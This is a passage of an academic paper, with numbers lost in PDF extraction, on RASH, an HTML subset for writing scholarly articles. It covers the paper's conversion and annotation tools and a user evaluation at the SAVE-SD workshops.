features of these two editors (e.g., styles, document properties, etc.), elements (e.g., lists, pictures, captions, footnotes, hyperlinks, etc.) and facilities (e.g., mathematical editor, cross-reference editor, etc.) can be used to produce fully compliant rash documents. a web-based service, for converting documents online (presented in ‘rocs’) and two java applications for odt (https://github.com/essepuntato/rash/tree/master/tools/odt rash) and docx (https://github.com/essepuntato/rash/tree/master/tools/docx rash) documents (that can be downloaded and used offline on the local machine) were developed to facilitate the conversion process of apache openoffice and microsoft word documents into the rash format. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.springer.com/computer/lncs?sgwid= - - - - http://www.springer.com/computer/lncs?sgwid= - - - - http://www.springer.com/computer/lncs?sgwid= - - - - http://dokie.li https://peerj.com http://www.acm.org/sigs/publications/proceedings-templates http://www.acm.org/sigs/publications/proceedings-templates http://www.springer.com/computer/lncs?sgwid= - - - - http://www.springer.com/computer/lncs?sgwid= - - - - https://github.com/essepuntato/rash/blob/master/xslt/from-odt.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-odt.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-docx.xsl https://github.com/essepuntato/rash/blob/master/xslt/from-docx.xsl https://rawgit.com/essepuntato/rash/master/documentation/rash-in-odt.odt https://rawgit.com/essepuntato/rash/master/documentation/rash-in-odt.odt https://rawgit.com/essepuntato/rash/master/documentation/rash-in-docx.docx https://rawgit.com/essepuntato/rash/master/documentation/rash-in-docx.docx https://github.com/essepuntato/rash/tree/master/tools/odt rash https://github.com/essepuntato/rash/tree/master/tools/docx rash http://dx.doi.org/ . /peerj-cs. figure rocs. the architecture of rocs. in the past few years, as sort of alpha-testing, we have used these conversion approaches with many internal projects in the digital and semantic publishing laboratory of the department of computer science and engineering at the university of bologna. moreover, also our co-authors and collaborators from different disciplines (e.g., business and management, humanities, medicine, etc.) have successfully used this approach for producing their documents, giving us a chance to have fruitful feedback, comments, and suggestions. in particular, we have been able to convert with discrete success several odt and docx files of research papers, phd theses, documentations, and project proposals and deliverables. rocs we created an online conversion tool called rocs (rash online conversion service) (http://dasplab.cs.unibo.it/rocs) (di iorio et al., ) for supporting authors in writing rash documents and preparing submissions that could be easily processed by journals, workshops, and conferences. rocs integrates the tools introduced in the previous sections. the abstract architecture of the tool is shown in fig. . rocs allows converting either an odt document or a docx document, written according to specific guidelines, into rash and, then, into latex according to the following layouts: springer lncs, acm ipcs, acm journal large, peerj. such guidelines, introduced in ‘producing rash from odt and docx’, are very simple and use only the basic features available in apache openoffice writer and in microsoft word, without any external tool or plug-in. rocs allows users to upload four kinds of file, i.e., an odt document, a docx document, an html file compliant with rash, and a zip archive which contains an peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dasplab.cs.unibo.it/rocs http://dx.doi.org/ . /peerj-cs. the source code and binaries of spar xtractor are available at https://github. com/essepuntato/rash/tree/master/sources/ spar-xtractor and https://github.com/ essepuntato/rash/tree/master/tools/spar- xtractor, respectively. the prefix po: stands for the namespace http://www.essepuntato.it/ / / pattern#. html file compliant with rash and related files (i.e., csss, javascript files, fonts, images). it returns a zip archive containing the original document plus all its converted versions, i.e., rash, if an odt/docx file was given, and the latex file. the main advantage of having the paper both in rash and in latex is that it is fairly easy for rash to be adopted by workshops, conferences or journals. since the program committee, the reviewers, and the editors have also access to a latex or a pdf version of the paper, the rash file is an addition that does not preclude any current workflows. of course, the hope is that the inherent advantages of an html-based format such as rash will eventually persuade stakeholders to adopt the html version whenever it is possible, keeping the alternatives as fall-back options. enriching rash documents with structural semantics another development of the rash framework concerns the automatic enrichment of rash documents with rdfa annotations defining the actual structure of such documents in terms of the frbr-aligned bibliographic ontology (fabio) (http://purl.org/spar/fabio) and the document component ontology (doco) (http://purl.org/spar/doco) (constantin et al., ). more in detail, we developed a java application called spar xtractor suite . spar xtractor is designed as a one-click tool able to add automatically structural semantics to a rash document. spar xtractor takes a rash document as input and returns a new rash document where all its markup elements have been annotated with their actual structural semantics by means of rdfa. the tool associates a set of fabio or doco types with specific html elements. the set of html elements and their associations with fabio or doco types can be customised according to specific needs of expressivity. the default association provided by the current release of spar xtractor is the following: • the root html element is mapped to an individual of the class fabio:expression (http://purl.org/spar/fabio/expression). the class fabio:expression identifies the specific intellectual or artistic form that a work takes each time it is realised; • the body element is mapped to an individual of the class doco:bodymatter (http://purl.org/spar/doco/bodymatter). the class doco:bodymatter is the central principle part of a document, it contains the real document content, and it is subdivided hierarchically by means of sections; • p elements are represented as individuals of the class doco:paragraph (http: //purl.org/spar/doco/paragraph), i.e., self-contained units of discourse that deal with a particular point or idea; • figure elements containing the element img within a paragraph are represented as individuals of the class doco:figurebox (http://purl.org/spar/doco/figurebox), which is a space within a document that contains a figure and its caption; • section elements are mapped to individuals of the class doco:section (http: //purl.org/spar/doco/section), which represents a logical division of the text. sections can be organised according to a variable level of nested sub-sections. accordingly, spar xtractor reflects this structural behaviour by representing the containment relation by means of the object property po:contains (http://www.essepuntato.it/ / / pattern#contains) . for example, a certain section element with a nested section peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/sources/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor https://github.com/essepuntato/rash/tree/master/tools/spar-xtractor http://www.essepuntato.it/ / /pattern# http://www.essepuntato.it/ / /pattern# https://peerj.com http://purl.org/spar/fabio http://purl.org/spar/doco http://purl.org/spar/fabio/expression http://purl.org/spar/doco/bodymatter http://purl.org/spar/doco/paragraph http://purl.org/spar/doco/paragraph http://purl.org/spar/doco/figurebox http://purl.org/spar/doco/section http://purl.org/spar/doco/section http://www.essepuntato.it/ / /pattern#contains http://www.essepuntato.it/ / /pattern#contains http://dx.doi.org/ . /peerj-cs. element produces two individuals of the class doco:section (e.g., :section_outer a doco:section and :section_inner a doco:section) related by the property po:contains (e.g., section_outer po:contains :section_inner). in addition to these semantic annotations, which come from the actual structure of a document, the tool is also able to automatically detect sentences and annotate them as individuals of the class doco:sentence (http://purl.org/spar/doco/sentence). a doco:sentence denotes an expression in natural language forming a single grammatical unit. for the sentence detection task, spar xtractor relies on the sentence detection module of the apache opennlp project (https://opennlp.apache.org/), which provides a machine learning based toolkit for the processing of natural language text. by default, spar xtractor is released to support english only. however, it is possible to extend it with new languages by adding their corresponding models for apache opennlp, most of which are available with an open licence (http://opennlp.sourceforge.net/models- . /). we remark that the object property po:contains is used for representing any kind of containment relation among the structural components that spar xtractor deals with. hence, the usage of such a property is not limited to the individuals of the class doco:section only. in fact, the property po:contains can be used, for example, for expressing the containment relation between a doco:bodymatter and a doco:section or between a doco:section and a doco:sentence. for example, let us consider the following code snippets that provide a sample html document. <html > ... <body > ... <section ><h >a section </h > ... <p>this is a sentence. this is another sentence of this paragraph.</p> ... <section ><h >a sub -section </h > ... </section > ... </section > ... </body > </html > the html document in the snippet above is enriched by spar xtractor resulting in the document reported in the snippet below. <html resource =" expression" typeof ="http :// purl.org/spar/fabio/expression"> ... <body resource ="body" typeof ="http :// purl.org/spar/doco/bodymatter" property ="http ://www.essepuntato.it / / / pattern#contains"> ... <section resource =" section_outer" typeof ="http :// purl.org/spar/doco/section" property ="http ://www.essepuntato.it / / / pattern#contains"> <h resource =" section_outer/title" typeof ="http :// purl.org/spar/doco/sectiontitle" > <span property ="http :// purl.org/spar/c o/hascontent"> a section </span > </h > ... <p resource =" section_outer/paragraph - " typeof ="http :// purl.org/spar/doco/paragraph" property ="http ://www.essepuntato.it / / / pattern#contains" > peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/spar/doco/sentence https://opennlp.apache.org/ http://opennlp.sourceforge.net/models- . / http://dx.doi.org/ . /peerj-cs. <span property ="http ://www.essepuntato.it / / / pattern#contains" resource =" section_outer/paragraph - / sentence - " typeof ="http :// purl.org/spar/doco/sentence"> <span property ="http :// purl.org/spar/c o/hascontent"> this is a sentence. </span > </span > <span property ="http ://www.essepuntato.it / / / pattern#contains" resource =" section_outer/paragraph - / sentence - " typeof ="http :// purl.org/spar/doco/sentence"> <span property ="http :// purl.org/spar/c o/hascontent"> this is another sentence of this paragraph. </span > </span > </p> ... <section resource =" section_inner" typeof ="http :// purl.org/spar/doco/section" property ="http ://www.essepuntato.it / / / pattern#contains"> <h resource =" section_inner/title" typeof ="http :// purl.org/spar/doco/sectiontitle" "> <span property ="http :// purl.org/spar/c o/hascontent"> a sub -section </span > </h > ... </section > ... </section > ... </body > </html > writing rash documents with a native editor a recent development of rash is the rash javascript editor (raje) (https://github.com/ essepuntato/rash/tools/raje) (spinaci et al., ), a multiplatform what you see is what you get (wysiwyg) word processor for writing scholarly articles in html, according to the rash format. in particular raje allows authors to write research papers in html natively by means of a user-friendly interface, instead of writing raw markup with an ide, a text editor or any external word processor raje guarantees to its users the benefits of a word processor combined with those given by an html-based format, i.e., interactiveness, accessibility and easiness to be processed by machine. in addition, raje uses the github api (https://api.github.com/) so as to allow authors to store their articles online, to keep track of changes by means of the github services, and to share the articles with others. rash and save-sd: an evaluation the true validation for rash as a format for research papers rests on its adoption by authors and workshops and its integration in the publishing process. for this reason, rash was first released in conjunction with the semantics, analytics, visualisation: enhancing scholarly data (save-sd ) workshop (http://cs.unibo.it/save-sd/ / index.html), co-located with www . it was subsequently adopted by a number of workshops and conferences (https://github.com/essepuntato/rash/#rash-papers-accepted- in-scholarly-venues). in this section, we will present an evaluation of rash based on the analysis of questionnaires completed by authors and reviewers of save-sd and save-sd (http://cs.unibo.it/save-sd/ /index.html) workshops and a study on rdf annotations in the relevant papers. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/essepuntato/rash/tools/raje https://github.com/essepuntato/rash/tools/raje https://api.github.com/ http://cs.unibo.it/save-sd/ /index.html http://cs.unibo.it/save-sd/ /index.html https://github.com/essepuntato/rash/#rash-papers-accepted-in-scholarly-venues https://github.com/essepuntato/rash/#rash-papers-accepted-in-scholarly-venues http://cs.unibo.it/save-sd/ /index.html http://dx.doi.org/ . /peerj-cs. the users were asked to fill a questionnaire which included a section about their background, a sus questionnaire and six open questions about their experience with rash. we will first introduce the two workshops and then discuss and compare the evaluation results. finally, we will present an analysis of the most frequent vocabularies and entities in rash papers. the completed questionnaires and the outcomes of the analysis are available at osborne & peroni ( ), while the rdf annotations considered in the study are embedded in the rash papers available in the save-sd and save-sd websites. we used the online version of the rdfa . distiller (https://www.w .org/ /pyrdfa/) for extracting the rdf annotations from the rash papers. it is worth noting that in there were no converters in the rash framework, and rocs was introduced immediately before save-sd . thus, in both years authors wrote rash papers with plain text editors or xml editors, apart from one author that used rocs in . in general, the authors appreciated rash and the tools in the rash framework, even if the editing environment and the converters are still limited. save-sd and save-sd was organized by some of the authors of this paper with the aim of bringing together publishers, companies, and researchers in order to bridge the gap between the theoretical/academic and practical/industrialaspects in regard toscholarly data. itwas thus a multifaceted workshop which drew researchers from a number of heterogeneous fields, such as document and knowledge engineering, semantic web, natural language processing, scholarly communication, bibliometrics and human–computer interaction. since many of the interested researchers were keen on experimenting with novel technologies regarding semantic publishing, it was a natural choice for the debut of rash. for this reason, save-sd allowed authors to submit papers using either rash or pdf, explicitly encouraging authors to test the new format. to this end, the organisers introduced a special award for the best submission in rash, according to the quality of the markup, the number of rdf statements defined in rdfa, and the number of rdf links to lod datasets. the possibility of submitting in rash was also advertised on social media (e.g., twitter (https: //twitter.com/savesdworkshop)), facebook (https://www.facebook.com/savesdworkshop)) and during various international events (e.g., dl (http://www.city.ac.uk/digital- libraries- ), ekaw (http://www.ida.liu.se/conferences/ekaw /home.html), force (https://www.force .org/meetings/force )). the initiative had a substantial success: the workshop received six out of submissions in rash and after the review process an additional author chose to prepare the camera- ready paper in rash. out of these seven final submissions, three were research papers, one was a position paper, and three posters/demo. these papers were submitted by authors from switzerland, italy, germany, netherlands, united kingdom, ireland, and the usa. at the time of the workshop submission deadline, there were no public tools available for converting other formats into rash. however, the authors were able to self-learn it by simply referring to the documentation page, confirming that computer scientists have no particular problem in handling it directly. the conversion of the rash submissions into the acm format requested by the sheridan publisher (responsible for the publications of peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/ /pyrdfa/ https://twitter.com/savesdworkshop https://twitter.com/savesdworkshop https://www.facebook.com/savesdworkshop http://www.city.ac.uk/digital-libraries- http://www.city.ac.uk/digital-libraries- http://www.ida.liu.se/conferences/ekaw /home.html https://www.force .org/meetings/force http://dx.doi.org/ . /peerj-cs. table user background for save-sd , save-sd . year ms word oo writer latex html xml relaxng sw rdfa turtle json-ld % % % % % % % % % % % % % % % % % % % % avr % % % % % % % % % % all www proceedings) was handled by the organisers through a semi-automatic process. in particular, they used the xslt files introduced in ‘converting rash into latex styles’ and had to fix only a few layout misalignments. six authors and four reviewers involved in save-sd participated in our evaluation. save-sd had the same characteristics and goals of the predecessor. in order to give authors full freedom, the organizer decided to accept not only rash, but any kind of html-based format. since it was not possible to handle the conversion of all possible html-based format to the publisher layout, the authors of alternative formats were asked to prepare a pdf of the camera-ready version according to the publisher needs. save-sd received out of submissions in rash from authors from italy, sweden, greece, germany, belgium, and the usa. in total, five out of the accepted papers were in rash, including two full papers, two demos, and one position paper. even if no author chose to submit in other html-based formats, this possibility will be kept open in future editions. differently from the previous edition, the proceedings were published as a dedicated lncs volume. the conversions of rash papers to the pdf documents in springer lncs layout was automatically handled by rocs. as in the previous workshop, we evaluated rash by conducting the same study (with the same exact questions) on ten people. seven authors of rash papers and three reviewers participated in the survey. user background it is useful to first assess the background of rash pioneer users in term of their knowledge of relevant technologies and software. for this reason, the first section of the survey included a number of statements about the user expertize (e.g., ‘‘i have extensive experience in writing academic papers with latex’’) and allowed five response options, from ‘‘strongly agree’’ to ‘‘strongly disagree’’. table shows the percentage of users who claimed to be familiar with a range of technologies (by selecting ‘‘agree’’ or ‘‘strongly agree’’). in , the authors were mainly from the semantic web community and therefore familiar with technologies such as rdfa and turtle. most of them knew how to correctly annotate an html file and understood the advantages of including semantic relationships in the paper. they also commonly used latex rather than microsoft word or openoffice writer. this suggests that they were acquainted with wysiwyg editors and had experience with complex formats. a qualitative analysis of the survey answers confirms this intuition; for example, an author remarked: ‘‘i am used to writing papers in latex so i do not want to bother with formatting and in that sense rash is similar’’. in the situation changed and only % of the users were familiar with semantic technologies. in addition, even if most of them knew how to use latex, the majority of peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. them had experience also with microsoft word. it seems thus that rash started to interest also less technical users with different research backgrounds. user survey we assessed the strengths and weaknesses of rash by means of six open questions. we summarize here the answers of both authors and reviewers for the and workshops. the reviewers answered only questions , , and . note that the questions were exactly the same in both editions and none of the users partecipated in both the surveys. save-sd survey • [q ] why did you choose the rash format for your paper? four authors answered that the main reason was to try it out, mostly because they ‘‘supported the idea of publishing academic papers as html’’ and were convinced that ‘‘pdf should be replaced’’. two of them added that they were motivated by the possibility of adding semantic annotations to their papers. • [q ] how effectively did rash support you in writing/reviewing the paper? the majority of the authors suggested that some tasks, such as setting up the bibliography, were still cumbersome. they added that the development of tools that could solve these issues and hide the technical details from the common users would be very important for a broader adoption. the reviewers remarked that their experience was very similar to reviewing a paper in pdf format and did not present any particular challenge (e.g., ‘‘did not have many features that would distinguish it from a pdf’’, ‘‘it met all of my needs and was easy to use’’). • [q ] what were the most useful features of rash to help you writing/reviewing the paper? the authors listed a number of functionalities including the multiple graphical layouts (two authors), the support of rdfa annotations (two) and the built-in validation (one). the ability to display the paper according to different layouts was praised also by reviewers. • [q ] what were the main weaknesses that rash exhibited in supporting the writing/re- viewing of the paper? most authors suggested that the handling of bibliography, figures and captions should be improved. half of them also pointed out that the manual insertion of semantic annotations was cumbersome and a large amount of rdfa ‘‘introduces a bit of confusion in the paper’’. an author observed that using the word count as a limit in the rash venues rather than the number of pages introduces the issue of possibly exceeding the editor limits. most reviewers did not report any problem in using rash for assessing a paper. however, one of them noted that it still lacked a menu for easily navigating the different sections, as pdf files instead support. • [q ] can you think of any additional features to be included in rash that would have helped you to write/review the paper? the majority of authors suggested that the aforementioned limitations were mainly peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. due to the use of an html editor, requesting the development of a wysiwyg editor or a tool for converting from odt to rash. a user also suggested developing a tool for graphically showing the semantic annotations, as ‘‘what is linked to what, in order to check the correctness of assertions’’ and a reviewer advised to implement a way to easily access the different sections of the document. • [q ] would you use rash regularly for writing your academic papers? five out of six authors answered they would like to keep using rash. most of them, however, added that this would also depend on the creation of a better editor and a solid array of tools for managing technical details and converting standard formats for writing a research paper to and from rash. save-sd survey • [q ] why did you choose the rash format for your paper? as with the results, the majority of the authors (four) claimed that they adopted it for trying a new format, three authors because they were motivated by the workshop and three because they actively support the ideas behind rash. • [q ] how effectively did rash support you in writing/reviewing the paper? five users wrote the papers directly in rash and only one used open office and then converted it with rocs. in the first group, one user was positive, one neutral, and three suggested the need for a wysiwyg editor, since ‘‘writing in html is not so effective’’ and ‘‘not everyone [of the co-authors] knew how to validate against the schema’’. in particular, it was suggested the need for a microsoft word converter, since the odt produced by microsoft word could not be processed by rocs. as in , the reviewers did not find many differences with respect to pdf papers. one of them claimed to actually prefer rash since it ‘‘makes better use of the page space’’. • [q ] what were the most useful features of rash to help you writing/reviewing the pa- per? the authors mentioned a variety of different features including the formatting semantics (‘‘no worries about section and layout’’), the bibliographic reference management and the ability to display the paper according to different layouts. a reviewer also praised the ability to convert rash to pdf. • [q ] what were the main weaknesses that rash exhibited in supporting the writing/re- viewing of the paper? differently from , the authors had no particular problem with the handling of bibliography, figures, and captions. however, most of them (five) remarked that directly writing the html code was not trivial. three of them suggested solving the problem by introducing a wysiwyg editor, while two of them suggested creating new converters to translate latex and microsoft word into rash. one user also flagged that the visualization of rash document can change in different browsers. the reviewers, as in , did not report any particular problem in using rash. • [q ] can you think of any additional features to be included in rash that would have helped you to write/review the paper? consistently with the aforementioned weaknesses and the results the users called peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the authors who answered ‘‘strongly agree’’ to the background questions where classified as ‘‘experts’’, the ones who answered ‘‘agree’’ as ‘‘familiars’’, and all the others as ‘‘not familiar’’. for the creation of a wysiwyg editor ( ) and a way to convert from latex and microsoft words ( ). in addition, a user suggested a tool for automatically generating a bibliography, similar to bibtex. • [q ] would you use rash regularly for writing your academic papers? three authors asserted that they would be happy to keep using rash, two of them that they were ready to use it again, depending on its development, and only one was negative about it. rash usability we also performed a quantitative analysis of the usability of rash, using the system usability scale (sus) questionnaire (brooke, ). the scores are acceptable, though not very high, especially if we consider that all authors but one edited rash files directly with text/xml editors. users perceived even a ‘vanilla rash’ as acceptable, though they need more sophisticated converters as remarked in the open questions of the survey. rash yielded a mean score of . ± . , slightly lower than the average sus score ( ). however, sus scores varied dramatically according to the person’s background. figure shows the results of different categories of expertize in html, latex, and semantic web technologies (swt), which appear correlated with the average sus scores (respectively r = . , . , . ). users with a strong expertize in latex and swt yielded significantly better sus scores than the other authors, while authors with html expertize yielded only slightly better scores. for this reason, authors from , who as previously discussed had a higher expertize in these categories obtained an average sus score of . ± . , while the authors from yielded . ± . . however, the difference is not statistically significant because the two samples are small and the test power is low. these results further confirm that most users with limited expertize in non-wysiwyg editors and semantic technologies find it unfeasible to write html directly, even in a simplified form. analysis of rdf annotations in rash documents to complete the previous analysis, we also studied the nature of the semantic annotations in rash papers. we focused on a sample of , annotations obtained from papers published in save-sd and . the number of statements in a single paper was found to range from to , yielding a median value of ( th percentile , th percentile ). we extracted all the rdf statements by running the w c rdfa . distiller service (https://www.w .org/ /pyrdfa/) on each article. we then considered only the statements that used http-based entities as predicates, or their objects if used for typing resources. the data are organised in several csv files and have been obtained by running a python script we developed for gathering the data used in this evaluation. the script and all the aforementioned data have been made available at osborne & peroni ( ). the first goal of the study was to determine the prevalent vocabularies and how much they were used in the average paper. the left panel of fig. a shows the common vocabularies. schema.org and prism are actually enforced by rash: the first is used for standard metadata such as emails, affiliations and organization names and the second for keywords. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/ /pyrdfa/ http://dx.doi.org/ . /peerj-cs. figure expertize vs. perceived usability. user expertize in html, latex and semantic web tech- nologies versus average sus score. figure average number of statements per vocabulary. percentage of papers and average number of statements using a vocabulary. in addition, a quantity of rdf statements was automatically extracted when processing dpub-aria roles (garrish et al., ). thus we will not consider such vocabularies in the rest of the evaluation. the other common vocabularies are dublin core, which appears in % of the papers, foaf ( %) and the spar ontologies (peroni, a), such as fabio ( %) and cito ( %) (peroni & shotton, ). the right panel of fig. b illustrates the average number of statement for each of these vocabularies. dublin core characterizes the highest number of annotation ( . ), followed by foaf ( . ) and fabio ( . ). peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average number of entities per vocabulary. average percentage of vocabulary entities in a rash paper (excluding the mandatory ones). we also performed a more fine-grained analysis considering the amount of entities of these vocabularies within the various rdf statements. the goal was to understand the percentage of contribution that the various entities provide (on average) to the statements of the document analysed. as expected, the entities that contribute to about % of the statements are either those that are obliged by rash (prism:keyword . %, schema:affiliation . %, schema:name . %, and schema:email . %) or those automatically extracted by processing the dpub roles included, mandatorily, in the documents (xhtml:role %). excluding these, the following top ten entities, shown in fig. , cover about % of the statements. among these entities, there are three classes describing three diverse but interlinked kinds of objects, i.e., people (foaf:person) authoring a research work (fabio:researchpaper) and the sentences (doco:sentence) therein contained. the other seven entities are three object properties—two of them (pav:authoredby and pattern:contains) provide the links between the three aforementioned classes, while the other, i.e., cito:cites, describes citation links between papers—and four data properties—used for providing additional metadata about the entities (dcterms:title, dcterms:bibliographiccitation, foaf:name) and for describing bunches of textual content of the sentences (c o:hascontent). discussion the evaluation study confirmed that rash is ready to be adopted in workshops, conferences, and journals and can be quickly learnt by researchers who are already familiar with html. however, it also highlighted some issues in the adoption of html formats, especially by less technically savvy users. interestingly, the survey showed that rash is being tried also by users unfamiliar with semantic web technology. while the expansion of the user base represents a positive development, it also yields a number of challenges. the mass of authors accustomed to peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. wysiwyg editors such as microsoft word or openoffice writer, tend to have difficulties with html editors. in addition, since research papers are often written by multiple authors, it is usually simpler to use the most well-known solutions. for these reasons, we need to offer the authors who currently cannot or do not want to change their workflow the tools for converting their favourite format in to rash and annotate the resulting paper. while odt was a first step in this direction, it is imperative to be also able to process docx (which has been already implemented) and latex. a second important issue is that authors who are not expert in semantic technologies can find it hard to correctly annotate their papers. hence, we also need to use and/or develop simple tools for helping authors in this phase—such as the openlink structured data editor (http://osde.openlinksw.com/). the introduction of these solutions will be critical for motivating users to adopt html-based approaches and for creating a robust framework that can be used by expert and common users alike. as far as the analysis of the rdf annotations in rash documents is concerned, the outcomes highlighted that the users decided to adopt a few well-known standard vocabularies, rather than using a multiplicity of different solutions. the most used vocabularies other than schema.org and prism (used by default by rash), are dublin core, foaf, and the spar ontologies. however, the outcomes of our evaluation generally show a quite low number of statements specified by the authors. this behaviour could derive from the lack of appropriate support for the annotation of rash papers with rdf data. in addition, this low number seems not to be related to the research community the authors work in. for instance, several of the papers written by semantic web experts do not include any rdf statements other than those enforced by rash. conclusions in this paper we have introduced rash, a markup language defined as a subset of html for writing scientific articles, and the rash framework, a set of specifications and tools for writing articles in rash. in particular, we have discussed the rationale behind the development of rash, and we have presented the language and the validation/visualisation/conversion/extraction/editing tools developed so far. the goal of the paper was also to investigate the applicability and the potentialities of rash, though the evaluation of its adoption in two save-sd workshops. to the best of our knowledge, this is the first empirical evaluation on the adoption of html-based languages for writing scientific papers. the experiments proved that rash can be successfully used for workshops and conferences, with a good acceptance by the authors and a smooth integration in the existing publishing process. as immediate future developments, we plan to develop tools for automating the process of semantic enrichment of rash documents. for instance, we are currently working on the automatic identification of section rhetorics and citation functions so as to describe them according to two spar ontologies (peroni, a), i.e., the document component ontology (doco) (http://purl.org/spar/doco) and the citation typing ontology (cito) (http://purl.org/spar/cito) respectively. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://osde.openlinksw.com/ http://purl.org/spar/doco http://purl.org/spar/cito http://dx.doi.org/ . /peerj-cs. we intend to further develop the rash framework. in first instance, we are working on more sophisticated authoring tools and converters. for instance, we are currently developing additional xslt documents in order to convert rash documents into several different latex formats for scholarly communications—such as ieee conference proceedings and ios press—as well as into epub for easing its (offline) portability in mobile devices, which is something that would guarantee a better archival and accessibility of the whole document including its figures, css files, and js scripts. we are also experimenting techniques for automatically generating accessible graphs from data contained in a referenced csv file. some results of this experimentation are already discussed in di mirri et al. ( ). acknowledgements we would like to thank sarven capadisli (http://csarven.ca/) for our inspiring discussions on the topic, all the authors and the reviewers of the accepted papers of the save-sd (http://cs.unibo.it/save-sd/ /accepted-papers.html) and the save-sd (http: //cs.unibo.it/save-sd/ /accepted-papers.html) workshops for having provided us useful suggestions and insights for improving rash and the related tools, as well as all the other early adopters of rash. we would also like to thank the other two organisers of the past two edition of save-sd, i.e., jun zhao (https://sites.google.com/site/junzhaohome/) and alejandra gonzalez-beltran (http://www.oerc.ox.ac.uk/people/alejandra) for supporting us in the adoption of rash as possible html submission format. in addition, we are particularly grateful to all the github users that suggested and introduced new features to rash and developed the tools included in its framework: alberto nicoletti (https: //twitter.com/illbexyz), vincenzo rubano (https://twitter.com/titengodocchio), mike smith (https://sideshowbarker.net/), gianmarco spinaci (https://twitter.com/spino ), ruben verborgh (http://ruben.verborgh.org). additional information and declarations funding the authors received no funding for this work. competing interests silvio peroni is an academic editor for peerj computer science. author contributions • silvio peroni conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • francesco osborne conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://csarven.ca/ http://cs.unibo.it/save-sd/ /accepted-papers.html http://cs.unibo.it/save-sd/ /accepted-papers.html http://cs.unibo.it/save-sd/ /accepted-papers.html https://sites.google.com/site/junzhaohome/ http://www.oerc.ox.ac.uk/people/alejandra https://twitter.com/illbexyz https://twitter.com/illbexyz https://twitter.com/titengodocchio https://sideshowbarker.net/ https://twitter.com/spino http://ruben.verborgh.org http://dx.doi.org/ . /peerj-cs. • angelo di iorio wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • andrea giovanni nuzzolese and francesco poggi contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • fabio vitali and enrico motta reviewed drafts of the paper. data availability the following information was supplied regarding data availability: osborne, francesco; peroni, silvio ( ): outcomes of save-sd and questionnaires on rash and analysis of rdf annotations in the rash papers. figshare. https://dx.doi.org/ . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alexander c. . the timeless way of building. oxford: oxford university press. atkins jr t, etemad ej, rivoal f. . css snapshot . w c working group note january . world wide web consortium. available at https://www.w .org/ tr/css -roadmap/ . berjon r, ballesteros s. . what is scholarly html? available at http://scholarly. vernacular.io/ . bourne pe, clark t, dale r, de waard a, herman i, hovy eh, shotton d. . force white paper: improving the future of research communications and e-scholarship. white paper, october . force . available at https://www. force .org/white_paper. brooke j. . sus-a quick and dirty usability scale. usability evaluation in industry ( ): – . capadisli s, guy a, verborgh r, lange c, auer s, berners-lee t. . decentralised authoring, annotations and notifications for a read-write web with dokieli. in: proceedings of the th international conference on web engineering. cham: springer, – doi . / - - - - _ . capadisli s, riedl r, auer s. . enabling accessible knowledge. in: proceedings of the international conference for e-democracy and open government (cedem ). krems: universität krems. available at http://csarven.ca/enabling-accessible- knowledge. carlisle d, ion p, miner r. . mathematical markup language (mathml) version . . nd edition. w c recommendation april . world wide web consor- tium. available at http://www.w .org/tr/mathml / . clark j, makoto m. . relax ng specification. committee specification, decem- ber . oasis. available at http://relaxng.org/spec- .html. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://dx.doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.w .org/tr/css -roadmap/ https://www.w .org/tr/css -roadmap/ http://scholarly.vernacular.io/ http://scholarly.vernacular.io/ https://www.force .org/white_paper https://www.force .org/white_paper http://dx.doi.org/ . / - - - - _ http://csarven.ca/enabling-accessible-knowledge http://csarven.ca/enabling-accessible-knowledge http://www.w .org/tr/mathml / http://relaxng.org/spec- .html http://dx.doi.org/ . /peerj-cs. constantin a, peroni s, pettifer s, shotton d, vitali f. . the document compo- nent ontology (doco). semantic web ( ): – doi . /sw- . cyganiak r, wood d, lanthaler m. . rdf . concepts and abstract syntax. w c recommendation february . world wide web consortium. available at http://www.w .org/tr/rdf -concepts/ . di iorio a, gonzález beltrán a, osborne f, peroni s, poggi f, vitali f. . it rocs!: the rash online conversion service. in: www (companion volume) . new york: acm, – doi . / . . di iorio a, peroni s, poggi f, vitali f. . a first approach to the automatic recognition of structural patterns in xml documents. in: proceedings of the acm symposium on document engineering. new york: acm, – doi . / . . di iorio a, peroni s, poggi f, vitali f. . dealing with structural patterns of xml documents. journal of the american society for information science and technology ( ): – doi . /asi. . di iorio a, peroni s, poggi f, vitali f, shotton d. . recognising document compo- nents in xml-based academic articles. 